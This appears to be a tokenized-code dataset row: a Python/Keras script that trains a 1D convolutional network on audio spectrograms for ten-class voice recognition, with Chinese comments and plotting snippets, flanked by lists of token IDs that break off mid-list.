850,
14681,
198,
11748,
1976,
8019,
198,
198,
6738,
2172,
29572,
1330,
16018,
46677,
198,
6738,
2956,
297,
571,
17,
1330,
14626,
12331,
198,
6738,
2956,
297,
571,
17,
1330,
19016,
9654,
198,
6738,
19016,
29572,
1330,
19016,
29572,
198,
6738,
35555,
13,
3438,
13,
1084,
312,
296,
1330,
21136,
10100,
198,
198,
6404,
1362,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628,
628,
628,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
198
] | 3.276596 | 282 |
"""
技术要点:1、创建基于声谱图的卷积神经网络模型(十分类),本文件为第五版本
2、三种功能选择:训练并保存模型、评估模型、类别预测
3、三种训练方法:2d卷积、沿时间卷积、沿频率卷积
4、添加了绘制准确率和损失值变化曲线的代码;
5、注释掉早停法代码行;
6、模型训练回调函数改为logs_loss。
改进方面:音频预处理后再训练
运行结果:300轮训练后,准确率可达到84%
准确率和损失值曲线效果较好,其他曲线效果不佳
"""
import numpy as np
from scipy import signal
import scipy.io.wavfile as wav
import os
import time
import sys
from keras.utils.np_utils import to_categorical
import matplotlib.pyplot as plt
# import skimage.io
import platform
import tensorflow as tf
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
config = tf.ConfigProto()
config.gpu_options.allow_growth=True #不全部占满显存, 按需分配
session = tf.Session(config=config)
plt.switch_backend('agg')
a = platform.platform()
if "Windows" in a:
splitchar = "\\"
elif "Linux" in a:
splitchar = "/"
print('\n', a, '\n')
ROOT_DIR = os.path.abspath('.')
wav_path = os.path.join(ROOT_DIR, "ALL_hd_random")
##########################################################################
##########################################################################
number_of_classes = 10
# 读取文件
train_files = get_wav_files(os.path.join(wav_path, "train"))
test_files = get_wav_files(os.path.join(wav_path, "test"))
# 数据预处理
train_x, train_y, max_freq, max_time = data_preprocess(train_files, number_of_classes)
test_x, test_y, max_freq, max_time = data_preprocess(test_files, number_of_classes)
import random
randnum = random.randint(0, 100)
random.seed(randnum)
random.shuffle(train_x)
random.seed(randnum)
random.shuffle(train_y)
from keras.models import Sequential, load_model
from keras.layers import MaxPool1D, Conv1D, Conv2D, MaxPool2D, Flatten, Dense, BatchNormalization, Dropout
from keras.callbacks import EarlyStopping
from keras.optimizers import RMSprop
from keras.metrics import categorical_accuracy
from keras import regularizers
import keras
task = 'train' # train or evaluate or predict
if task == 'train':
model = Sequential()
# model.add(Conv2D(filters=16,kernel_size=(3,3), input_shape=(max_time,max_freq,1),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=8,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Conv2D(filters=4,kernel_size=(3,3),activation='relu'))
# model.add(BatchNormalization())
# model.add(MaxPool2D(pool_size=(2,2)))
# model.add(Flatten())
# #model.add(Dropout(0.5))
# model.add(Dense(128, activation='relu'))
# #model.add(Dropout(0.5))
# model.add(Dense(number_of_classes, activation='softmax'))
model.add(Conv1D(max_freq, 10, input_shape=(max_time, max_freq), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Conv1D(max_freq, 4, activation='relu'))
model.add(BatchNormalization())
model.add(MaxPool1D(4))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(max_freq, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(number_of_classes, activation='softmax'))
model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=['categorical_accuracy'])
# 函数开始时创建盛放loss与acc的容器
# 按照batch来进行追加数据
# 绘图,这里把每一种曲线都单独绘图,若想把各种曲线绘制在一张图上的话可修改此方法
# 由于这里的绘图设置的是5s绘制一次,当训练结束后得到的图可能不是一个完整的训练过程
# (最后一次绘图结束,又训练了0-5秒的时间)
# 所以这里的方法会在整个训练结束以后调用
logs_loss = LossHistory()
# model=load_model('voice_recog_spectrogram_new1.h5')
# print(model.summary())
# model.pop()
# model.add(Dense(number_of_classes, activation='softmax',name='output'))
# model.compile(loss="categorical_crossentropy", optimizer='adam', metrics=[categorical_accuracy])
# early_stopping = EarlyStopping(monitor='val_loss', patience=10)
model.fit(train_x, train_y, batch_size=20, epochs=300, validation_split=0.1, callbacks=[logs_loss]) # callbacks=[early_stopping]
# 保存模型。
model.save('voice_recog_spectrogram_preprcsess_300epochs_04.h5')
logs_loss.end_draw()
"""第一种方法:训练完成时直接绘制acc和loss变化曲线
train_log = model.fit_generator(train_generator,
steps_per_epoch = nb_train_samples// batch_size,
epochs = epochs,
validation_data = validation_generator,
validation_steps =nb_validation_samples // batch_size,
)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
plt.plot(np.arange(0, epochs), train_log.history["loss"], label="train_loss")
plt.plot(np.arange(0, epochs), train_log.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, epochs), train_log.history["acc"], label="train_acc")
plt.plot(np.arange(0, epochs), train_log.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_alexnet_{:d}e.jpg".format(epochs))
"""
"""第二种方法:训练过程中保留Accuracy和Loss值至csv文件,完成后再读取画图
import pandas as pd
import matplotlib.pyplot as plt
log = pd.read_csv('./log/mix_r40_g800_log_0511160953_300e.csv')
l = list(log['epoch;acc;loss;val_acc;val_loss'])
epoch = []
acc = []
loss = []
val_acc = []
val_loss = []
for i in range(0,len(l)):
epoch.append(l[i].split(';')[0])
acc.append(l[i].split(';')[1])
loss.append(l[i].split(';')[2])
val_acc.append(l[i].split(';')[3])
val_loss.append(l[i].split(';')[4])
plt.style.use("ggplot") #设置绘图风格
plt.figure(figsize=(15,10)) #设置绘图大小,单位inch
plt.plot(epoch, loss, label="train_loss")
plt.plot(epoch, val_loss, label="val_loss")
plt.plot(epoch, acc, label="train_acc")
plt.plot(epoch, val_acc, label="val_acc")
plt.title("Training Loss and Accuracy on sar classifier")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="upper right")
plt.savefig("Loss_Accuracy_mix_40-800_300e.jpg")
"""
elif task == 'evaluate':
model = load_model('voice_recog_spectrogram_new2.h5')
accuracy = model.evaluate(test_x, test_y, batch_size=1)
print('test loss and accuracy:', accuracy)
elif task == 'predict':
model = load_model('voice_recog_spectrogram_new2.h5')
result = model.predict_on_batch(test_x)
print(result)
# from keras.utils.vis_utils import plot_model
# plot_model(model,to_file="model_1.png",show_shapes=True)
| [
37811,
198,
162,
232,
222,
17312,
107,
17358,
223,
163,
224,
117,
171,
120,
248,
16,
23513,
26344,
249,
161,
119,
118,
161,
253,
118,
12859,
236,
18004,
108,
164,
108,
109,
32368,
122,
21410,
39355,
115,
163,
100,
107,
15351,
163,
119,
237,
163,
121,
239,
163,
119,
250,
162,
101,
94,
161,
252,
233,
171,
120,
230,
39355,
223,
26344,
228,
163,
109,
119,
171,
120,
231,
171,
120,
234,
17312,
105,
23877,
229,
20015,
114,
10310,
118,
163,
105,
105,
49390,
48304,
17312,
105,
198,
220,
220,
220,
220,
220,
220,
220,
362,
23513,
49011,
163,
100,
235,
27950,
253,
47797,
121,
34460,
231,
162,
233,
102,
171,
120,
248,
164,
106,
255,
163,
119,
225,
33176,
114,
46479,
251,
27764,
246,
162,
101,
94,
161,
252,
233,
23513,
46237,
226,
27670,
108,
162,
101,
94,
161,
252,
233,
23513,
163,
109,
119,
26344,
104,
165,
95,
226,
38184,
233,
198,
220,
220,
220,
220,
220,
220,
220,
513,
23513,
49011,
163,
100,
235,
164,
106,
255,
163,
119,
225,
43095,
37345,
243,
171,
120,
248,
17,
67,
39355,
115,
163,
100,
107,
23513,
162,
110,
123,
33768,
114,
29785,
112,
39355,
115,
163,
100,
107,
23513,
162,
110,
123,
165,
95,
239,
163,
236,
229,
39355,
115,
163,
100,
107,
198,
220,
220,
220,
220,
220,
220,
220,
604,
23513,
162,
115,
119,
27950,
254,
12859,
228,
163,
119,
246,
26344,
114,
49035,
228,
163,
94,
106,
163,
236,
229,
161,
240,
234,
162,
235,
253,
13783,
109,
161,
222,
120,
20998,
246,
44293,
244,
162,
249,
110,
163,
118,
123,
21410,
47987,
163,
254,
223,
171,
120,
249,
198,
220,
220,
220,
220,
220,
220,
220,
642,
23513,
37345,
101,
34932,
232,
162,
236,
231,
33768,
102,
161,
223,
250,
37345,
243,
47987,
163,
254,
223,
26193,
234,
171,
120,
249,
198,
220,
220,
220,
220,
220,
220,
220,
718,
23513,
162,
101,
94,
161,
252,
233,
164,
106,
255,
163,
119,
225,
32368,
252,
164,
108,
225,
49035,
121,
46763,
108,
162,
242,
117,
10310,
118,
6404,
82,
62,
22462,
16764,
198,
162,
242,
117,
32573,
249,
43095,
165,
251,
95,
171,
120,
248,
165,
253,
111,
165,
95,
239,
165,
95,
226,
13783,
226,
49426,
228,
28938,
236,
37863,
235,
164,
106,
255,
163,
119,
225,
198,
32573,
238,
26193,
234,
163,
119,
241,
162,
252,
250,
171,
120,
248,
6200,
164,
121,
106,
164,
106,
255,
163,
119,
225,
28938,
236,
171,
120,
234,
49035,
228,
163,
94,
106,
163,
236,
229,
20998,
107,
164,
122,
122,
26344,
108,
5705,
4,
198,
220,
220,
220,
220,
220,
220,
220,
10263,
229,
228,
163,
94,
106,
163,
236,
229,
161,
240,
234,
162,
235,
253,
13783,
109,
161,
222,
120,
162,
249,
110,
163,
118,
123,
46763,
230,
162,
252,
250,
164,
122,
225,
25001,
121,
171,
120,
234,
17739,
114,
20015,
244,
162,
249,
110,
163,
118,
123,
46763,
230,
162,
252,
250,
38834,
19526,
111,
198,
37811,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
629,
541,
88,
1330,
6737,
198,
11748,
629,
541,
88,
13,
952,
13,
45137,
7753,
355,
266,
615,
198,
11748,
28686,
198,
11748,
640,
198,
11748,
25064,
198,
6738,
41927,
292,
13,
26791,
13,
37659,
62,
26791,
1330,
284,
62,
66,
2397,
12409,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
2,
1330,
1341,
9060,
13,
952,
198,
11748,
3859,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
198,
418,
13,
268,
2268,
14692,
43633,
5631,
62,
29817,
34563,
62,
39345,
34444,
8973,
796,
366,
16,
1,
198,
11250,
796,
48700,
13,
16934,
2964,
1462,
3419,
198,
11250,
13,
46999,
62,
25811,
13,
12154,
62,
27922,
28,
17821,
1303,
38834,
17739,
101,
32849,
101,
39355,
254,
162,
119,
94,
23626,
122,
27764,
246,
11,
10545,
234,
231,
165,
250,
222,
26344,
228,
165,
227,
235,
198,
29891,
796,
48700,
13,
36044,
7,
11250,
28,
11250,
8,
198,
489,
83,
13,
31943,
62,
1891,
437,
10786,
9460,
11537,
198,
198,
64,
796,
3859,
13,
24254,
3419,
198,
361,
366,
11209,
1,
287,
257,
25,
198,
220,
220,
220,
4328,
2007,
283,
796,
366,
6852,
1,
198,
417,
361,
366,
19314,
1,
287,
257,
25,
198,
220,
220,
220,
4328,
2007,
283,
796,
12813,
1,
198,
4798,
10786,
59,
77,
3256,
257,
11,
705,
59,
77,
11537,
198,
198,
13252,
2394,
62,
34720,
796,
28686,
13,
6978,
13,
397,
2777,
776,
10786,
2637,
8,
198,
45137,
62,
6978,
796,
28686,
13,
6978,
13,
22179,
7,
13252,
2394,
62,
34720,
11,
366,
7036,
62,
31298,
62,
25120,
4943,
628,
628,
198,
29113,
29113,
7804,
2235,
198,
29113,
29113,
7804,
2235,
198,
198,
17618,
62,
1659,
62,
37724,
796,
838,
198,
198,
2,
5525,
107,
119,
20998,
244,
23877,
229,
20015,
114,
198,
27432,
62,
16624,
796,
651,
62,
45137,
62,
16624,
7,
418,
13,
6978,
13,
22179,
7,
45137,
62,
6978,
11,
366,
27432,
48774,
198,
9288,
62,
16624,
796,
651,
62,
45137,
62,
16624,
7,
418,
13,
6978,
13,
22179,
7,
45137,
62,
6978,
11,
366,
9288,
48774,
198,
198,
2,
10545,
243,
108,
162,
235,
106,
165,
95,
226,
13783,
226,
49426,
228,
198,
27432,
62,
87,
11,
4512,
62,
88,
11,
3509,
62,
19503,
80,
11,
3509,
62,
2435,
796,
1366,
62,
3866,
14681,
7,
27432,
62,
16624,
11,
1271,
62,
1659,
62,
37724,
8,
198,
9288,
62,
87,
11,
1332,
62,
88,
11,
3509,
62,
19503,
80,
11,
3509,
62,
2435,
796,
1366,
62,
3866,
14681,
7,
9288,
62,
16624,
11,
1271,
62,
1659,
62,
37724,
8,
198,
198,
11748,
4738,
198,
198,
25192,
22510,
796,
4738,
13,
25192,
600,
7,
15,
11,
1802,
8,
198,
25120,
13,
28826,
7,
25192,
22510,
8,
198,
25120,
13,
1477,
18137,
7,
27432,
62,
87,
8,
198,
25120,
13,
28826,
7,
25192,
22510,
8,
198,
25120,
13,
1477,
18137,
7,
27432,
62,
88,
8,
198,
198,
6738,
41927,
292,
13,
27530,
1330,
24604,
1843,
11,
3440,
62,
19849,
198,
6738,
41927,
292,
13,
75,
6962,
1330,
5436,
27201,
16,
35,
11,
34872,
16,
35,
11,
34872,
17,
35,
11,
5436,
27201,
17,
35,
11,
1610,
41769,
11,
360,
1072,
11,
347,
963,
26447,
1634,
11,
14258,
448,
198,
6738,
41927,
292,
13,
13345,
10146,
1330,
12556,
1273,
33307,
198,
6738,
41927,
292,
13,
40085,
11341,
1330,
371,
5653,
22930,
198,
6738,
41927,
292,
13,
4164,
10466,
1330,
4253,
12409,
62,
4134,
23843,
198,
6738,
41927,
292,
1330,
3218,
11341,
198,
11748,
41927,
292,
628,
198,
198,
35943,
796,
705,
27432,
6,
220,
1303,
4512,
393,
13446,
393,
4331,
198,
361,
4876,
6624,
705,
27432,
10354,
198,
220,
220,
220,
2746,
796,
24604,
1843,
3419,
628,
220,
220,
220,
1303,
2746,
13,
2860,
7,
3103,
85,
17,
35,
7,
10379,
1010,
28,
1433,
11,
33885,
62,
7857,
16193,
18,
11,
18,
828,
5128,
62,
43358,
16193,
9806,
62,
2435,
11,
9806,
62,
19503,
80,
11,
16,
828,
48545,
11639,
260,
2290,
6,
4008,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
33,
963,
26447,
1634,
28955,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
11518,
27201,
17,
35,
7,
7742,
62,
7857,
16193,
17,
11,
17,
22305,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
3103,
85,
17,
35,
7,
10379,
1010,
28,
23,
11,
33885,
62,
7857,
16193,
18,
11,
18,
828,
48545,
11639,
260,
2290,
6,
4008,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
33,
963,
26447,
1634,
28955,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
11518,
27201,
17,
35,
7,
7742,
62,
7857,
16193,
17,
11,
17,
22305,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
3103,
85,
17,
35,
7,
10379,
1010,
28,
19,
11,
33885,
62,
7857,
16193,
18,
11,
18,
828,
48545,
11639,
260,
2290,
6,
4008,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
33,
963,
26447,
1634,
28955,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
11518,
27201,
17,
35,
7,
7742,
62,
7857,
16193,
17,
11,
17,
22305,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
7414,
41769,
28955,
198,
220,
220,
220,
1303,
1303,
19849,
13,
2860,
7,
26932,
448,
7,
15,
13,
20,
4008,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
35,
1072,
7,
12762,
11,
14916,
11639,
260,
2290,
6,
4008,
198,
220,
220,
220,
1303,
1303,
19849,
13,
2860,
7,
26932,
448,
7,
15,
13,
20,
4008,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
35,
1072,
7,
17618,
62,
1659,
62,
37724,
11,
14916,
11639,
4215,
9806,
6,
4008,
628,
220,
220,
220,
2746,
13,
2860,
7,
3103,
85,
16,
35,
7,
9806,
62,
19503,
80,
11,
838,
11,
5128,
62,
43358,
16193,
9806,
62,
2435,
11,
3509,
62,
19503,
80,
828,
14916,
11639,
260,
2290,
6,
4008,
198,
220,
220,
220,
2746,
13,
2860,
7,
33,
963,
26447,
1634,
28955,
198,
220,
220,
220,
2746,
13,
2860,
7,
11518,
27201,
16,
35,
7,
19,
4008,
198,
220,
220,
220,
2746,
13,
2860,
7,
3103,
85,
16,
35,
7,
9806,
62,
19503,
80,
11,
604,
11,
14916,
11639,
260,
2290,
6,
4008,
198,
220,
220,
220,
2746,
13,
2860,
7,
33,
963,
26447,
1634,
28955,
198,
220,
220,
220,
2746,
13,
2860,
7,
11518,
27201,
16,
35,
7,
19,
4008,
198,
220,
220,
220,
2746,
13,
2860,
7,
7414,
41769,
28955,
198,
220,
220,
220,
2746,
13,
2860,
7,
26932,
448,
7,
15,
13,
20,
4008,
198,
220,
220,
220,
2746,
13,
2860,
7,
35,
1072,
7,
9806,
62,
19503,
80,
11,
14916,
11639,
260,
2290,
6,
4008,
198,
220,
220,
220,
2746,
13,
2860,
7,
26932,
448,
7,
15,
13,
20,
4008,
198,
220,
220,
220,
2746,
13,
2860,
7,
35,
1072,
7,
17618,
62,
1659,
62,
37724,
11,
14916,
11639,
4215,
9806,
6,
4008,
198,
220,
220,
220,
2746,
13,
5589,
576,
7,
22462,
2625,
66,
2397,
12409,
62,
19692,
298,
28338,
1600,
6436,
7509,
11639,
324,
321,
3256,
20731,
28,
17816,
66,
2397,
12409,
62,
4134,
23843,
6,
12962,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
10263,
229,
121,
46763,
108,
28156,
222,
34650,
233,
33768,
114,
26344,
249,
161,
119,
118,
33566,
249,
162,
242,
122,
22462,
10310,
236,
4134,
21410,
22522,
117,
161,
247,
101,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
10545,
234,
231,
163,
227,
100,
43501,
30266,
98,
32573,
249,
26193,
234,
164,
4204,
27950,
254,
46763,
108,
162,
235,
106,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
13328,
119,
246,
32368,
122,
171,
120,
234,
32573,
247,
34932,
234,
162,
232,
232,
162,
107,
237,
31660,
163,
100,
235,
162,
249,
110,
163,
118,
123,
32849,
121,
39355,
243,
45379,
105,
163,
119,
246,
32368,
122,
171,
120,
234,
164,
233,
98,
46349,
111,
162,
232,
232,
28938,
226,
163,
100,
235,
162,
249,
110,
163,
118,
123,
163,
119,
246,
26344,
114,
28839,
101,
31660,
28156,
254,
32368,
122,
41468,
21410,
46237,
251,
20998,
107,
46479,
106,
162,
242,
117,
29826,
97,
43095,
37345,
243,
628,
220,
220,
220,
220,
220,
220,
220,
1303,
13328,
242,
109,
12859,
236,
32573,
247,
34932,
234,
21410,
163,
119,
246,
32368,
122,
164,
106,
122,
163,
121,
106,
21410,
42468,
20,
82,
163,
119,
246,
26344,
114,
31660,
162,
105,
94,
171,
120,
234,
37605,
241,
164,
106,
255,
163,
119,
225,
163,
119,
241,
30266,
253,
28938,
236,
36181,
245,
26344,
108,
21410,
32368,
122,
20998,
107,
47797,
121,
38834,
42468,
31660,
10310,
103,
22522,
234,
46763,
112,
21410,
164,
106,
255,
163,
119,
225,
32573,
229,
163,
101,
233,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
27332,
120,
230,
17312,
222,
28938,
236,
31660,
162,
105,
94,
163,
119,
246,
32368,
122,
163,
119,
241,
30266,
253,
171,
120,
234,
20998,
42062,
106,
255,
163,
119,
225,
12859,
228,
15,
12,
20,
163,
100,
240,
21410,
33768,
114,
29785,
112,
171,
120,
231,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
10545,
231,
222,
20015,
98,
32573,
247,
34932,
234,
21410,
43095,
37345,
243,
27670,
248,
28839,
101,
46763,
112,
10310,
103,
164,
106,
255,
163,
119,
225,
163,
119,
241,
30266,
253,
20015,
98,
28938,
236,
164,
108,
225,
18796,
101,
628,
220,
220,
220,
17259,
62,
22462,
796,
22014,
18122,
3419,
628,
198,
220,
220,
220,
1303,
2746,
28,
2220,
62,
19849,
10786,
38888,
62,
8344,
519,
62,
4443,
39529,
62,
3605,
16,
13,
71,
20,
11537,
198,
220,
220,
220,
1303,
3601,
7,
19849,
13,
49736,
28955,
198,
220,
220,
220,
1303,
2746,
13,
12924,
3419,
198,
220,
220,
220,
1303,
2746,
13,
2860,
7,
35,
1072,
7,
17618,
62,
1659,
62,
37724,
11,
14916,
11639,
4215,
9806,
3256,
3672,
11639,
22915,
6,
4008,
198,
220,
220,
220,
1303,
2746,
13,
5589,
576,
7,
22462,
2625,
66,
2397,
12409,
62,
19692,
298,
28338,
1600,
6436,
7509,
11639,
324,
321,
3256,
20731,
41888,
66,
2397,
12409,
62,
4134,
23843,
12962,
628,
220,
220,
220,
1303,
1903,
62,
301,
33307,
796,
12556,
1273,
33307,
7,
41143,
11639,
2100,
62,
22462,
3256,
16336,
28,
940,
8,
198,
220,
220,
220,
2746,
13,
11147,
7,
27432,
62,
87,
11,
4512,
62,
88,
11,
15458,
62,
7857,
28,
1238,
11,
36835,
82,
28,
6200,
11,
21201,
62,
35312,
28,
15,
13,
16,
11,
869,
10146,
41888,
6404,
82,
62,
22462,
12962,
220,
1303,
869,
10146,
41888,
11458,
62,
301,
33307,
60,
198,
220,
220,
220,
1303,
220,
46479,
251,
27764,
246,
162,
101,
94,
161,
252,
233,
16764,
198,
220,
220,
220,
2746,
13,
21928,
10786,
38888,
62,
8344,
519,
62,
4443,
39529,
62,
3866,
1050,
6359,
408,
62,
6200,
538,
5374,
82,
62,
3023,
13,
71,
20,
11537,
628,
220,
220,
220,
17259,
62,
22462,
13,
437,
62,
19334,
3419,
628,
628,
220,
220,
220,
37227,
163,
105,
105,
31660,
163,
100,
235,
43095,
37345,
243,
171,
120,
248,
164,
106,
255,
163,
119,
225,
22522,
234,
22755,
238,
33768,
114,
33566,
112,
162,
236,
98,
163,
119,
246,
26344,
114,
4134,
161,
240,
234,
22462,
20998,
246,
44293,
244,
162,
249,
110,
163,
118,
123,
198,
220,
220,
220,
4512,
62,
6404,
796,
2746,
13,
11147,
62,
8612,
1352,
7,
27432,
62,
8612,
1352,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4831,
62,
525,
62,
538,
5374,
796,
299,
65,
62,
27432,
62,
82,
12629,
1003,
15458,
62,
7857,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
36835,
82,
796,
36835,
82,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
21201,
62,
7890,
796,
21201,
62,
8612,
1352,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
21201,
62,
20214,
220,
796,
46803,
62,
12102,
341,
62,
82,
12629,
3373,
15458,
62,
7857,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1267,
198,
220,
220,
220,
1303,
7110,
262,
3047,
2994,
290,
9922,
198,
220,
220,
220,
458,
83,
13,
7635,
13,
1904,
7203,
1130,
29487,
4943,
198,
220,
220,
220,
458,
83,
13,
26875,
3419,
198,
220,
220,
220,
458,
83,
13,
29487,
7,
37659,
13,
283,
858,
7,
15,
11,
36835,
82,
828,
4512,
62,
6404,
13,
23569,
14692,
22462,
33116,
6167,
2625,
27432,
62,
22462,
4943,
198,
220,
220,
220,
458,
83,
13,
29487,
7,
37659,
13,
283,
858,
7,
15,
11,
36835,
82,
828,
4512,
62,
6404,
13,
23569,
14692,
2100,
62,
22462,
33116,
6167,
2625,
2100,
62,
22462,
4943,
198,
220,
220,
220,
458,
83,
13,
29487,
7,
37659,
13,
283,
858,
7,
15,
11,
36835,
82,
828,
4512,
62,
6404,
13,
23569,
14692,
4134,
33116,
6167,
2625,
27432,
62,
4134,
4943,
198,
220,
220,
220,
458,
83,
13,
29487,
7,
37659,
13,
283,
858,
7,
15,
11,
36835,
82,
828,
4512,
62,
6404,
13,
23569,
14692,
2100,
62,
4134,
33116,
6167,
2625,
2100,
62,
4134,
4943,
198,
220,
220,
220,
458,
83,
13,
7839,
7203,
44357,
22014,
290,
33222,
319,
29008,
1398,
7483,
4943,
198,
220,
220,
220,
458,
83,
13,
87,
18242,
7203,
13807,
5374,
1303,
4943,
198,
220,
220,
220,
458,
83,
13,
2645,
9608,
7203,
43,
793,
14,
17320,
23843,
4943,
198,
220,
220,
220,
458,
83,
13,
1455,
437,
7,
17946,
2625,
45828,
826,
4943,
198,
220,
220,
220,
458,
83,
13,
21928,
5647,
7203,
43,
793,
62,
17320,
23843,
62,
1000,
87,
3262,
23330,
25,
67,
92,
68,
13,
9479,
1911,
18982,
7,
538,
5374,
82,
4008,
198,
37811,
628,
628,
220,
220,
220,
37227,
163,
105,
105,
12859,
234,
163,
100,
235,
43095,
37345,
243,
171,
120,
248,
164,
106,
255,
163,
119,
225,
32573,
229,
163,
101,
233,
40792,
46479,
251,
45911,
247,
17320,
23843,
161,
240,
234,
43,
793,
161,
222,
120,
164,
229,
111,
40664,
23877,
229,
20015,
114,
171,
120,
234,
22522,
234,
22755,
238,
28938,
236,
37863,
235,
46237,
119,
20998,
244,
18796,
119,
32368,
122,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
6404,
796,
279,
67,
13,
961,
62,
40664,
7,
4458,
14,
6404,
14,
19816,
62,
81,
1821,
62,
70,
7410,
62,
6404,
62,
2713,
1157,
1433,
2931,
4310,
62,
6200,
68,
13,
40664,
11537,
198,
198,
75,
796,
1351,
7,
6404,
17816,
538,
5374,
26,
4134,
26,
22462,
26,
2100,
62,
4134,
26,
2100,
62,
22462,
6,
12962,
198,
198,
538,
5374,
796,
17635,
198,
4134,
796,
17635,
198,
22462,
796,
17635,
198,
2100,
62,
4134,
796,
17635,
198,
2100,
62,
22462,
796,
17635,
198,
198,
1640,
1312,
287,
2837,
7,
15,
11,
11925,
7,
75,
8,
2599,
198,
220,
220,
220,
36835,
13,
33295,
7,
75,
58,
72,
4083,
35312,
10786,
26,
11537,
58,
15,
12962,
198,
220,
220,
220,
697,
13,
33295,
7,
75,
58,
72,
4083,
35312,
10786,
26,
11537,
58,
16,
12962,
198,
220,
220,
220,
2994,
13,
33295,
7,
75,
58,
72,
4083,
35312,
10786,
26,
11537,
58,
17,
12962,
198,
220,
220,
220,
1188,
62,
4134,
13,
33295,
7,
75,
58,
72,
4083,
35312,
10786,
26,
11537,
58,
18,
12962,
198,
220,
220,
220,
1188,
62,
22462,
13,
33295,
7,
75,
58,
72,
4083,
35312,
10786,
26,
11537,
58,
19,
12962,
628,
198,
489,
83,
13,
7635,
13,
1904,
7203,
1130,
29487,
4943,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
164,
106,
122,
163,
121,
106,
163,
119,
246,
32368,
122,
45617,
236,
43718,
120,
198,
489,
83,
13,
26875,
7,
5647,
7857,
16193,
1314,
11,
940,
4008,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
164,
106,
122,
163,
121,
106,
163,
119,
246,
32368,
122,
32014,
22887,
237,
171,
120,
234,
39355,
243,
19526,
235,
8589,
198,
489,
83,
13,
29487,
7,
538,
5374,
11,
2994,
11,
6167,
2625,
27432,
62,
22462,
4943,
198,
489,
83,
13,
29487,
7,
538,
5374,
11,
1188,
62,
22462,
11,
6167,
2625,
2100,
62,
22462,
4943,
198,
489,
83,
13,
29487,
7,
538,
5374,
11,
697,
11,
6167,
2625,
27432,
62,
4134,
4943,
198,
489,
83,
13,
29487,
7,
538,
5374,
11,
1188,
62,
4134,
11,
6167,
2625,
2100,
62,
4134,
4943,
198,
489,
83,
13,
7839,
7203,
44357,
22014,
290,
33222,
319,
29008,
1398,
7483,
4943,
198,
489,
83,
13,
87,
18242,
7203,
13807,
5374,
1303,
4943,
198,
489,
83,
13,
2645,
9608,
7203,
43,
793,
14,
17320,
23843,
4943,
198,
489,
83,
13,
1455,
437,
7,
17946,
2625,
45828,
826,
4943,
198,
489,
83,
13,
21928,
5647,
7203,
43,
793,
62,
17320,
23843,
62,
19816,
62,
1821,
12,
7410,
62,
6200,
68,
13,
9479,
4943,
198,
37811,
628,
198,
198,
417,
361,
4876,
6624,
705,
49786,
10354,
198,
220,
220,
220,
2746,
796,
3440,
62,
19849,
10786,
38888,
62,
8344,
519,
62,
4443,
39529,
62,
3605,
17,
13,
71,
20,
11537,
198,
220,
220,
220,
9922,
796,
2746,
13,
49786,
7,
9288,
62,
87,
11,
1332,
62,
88,
11,
15458,
62,
7857,
28,
16,
8,
198,
220,
220,
220,
3601,
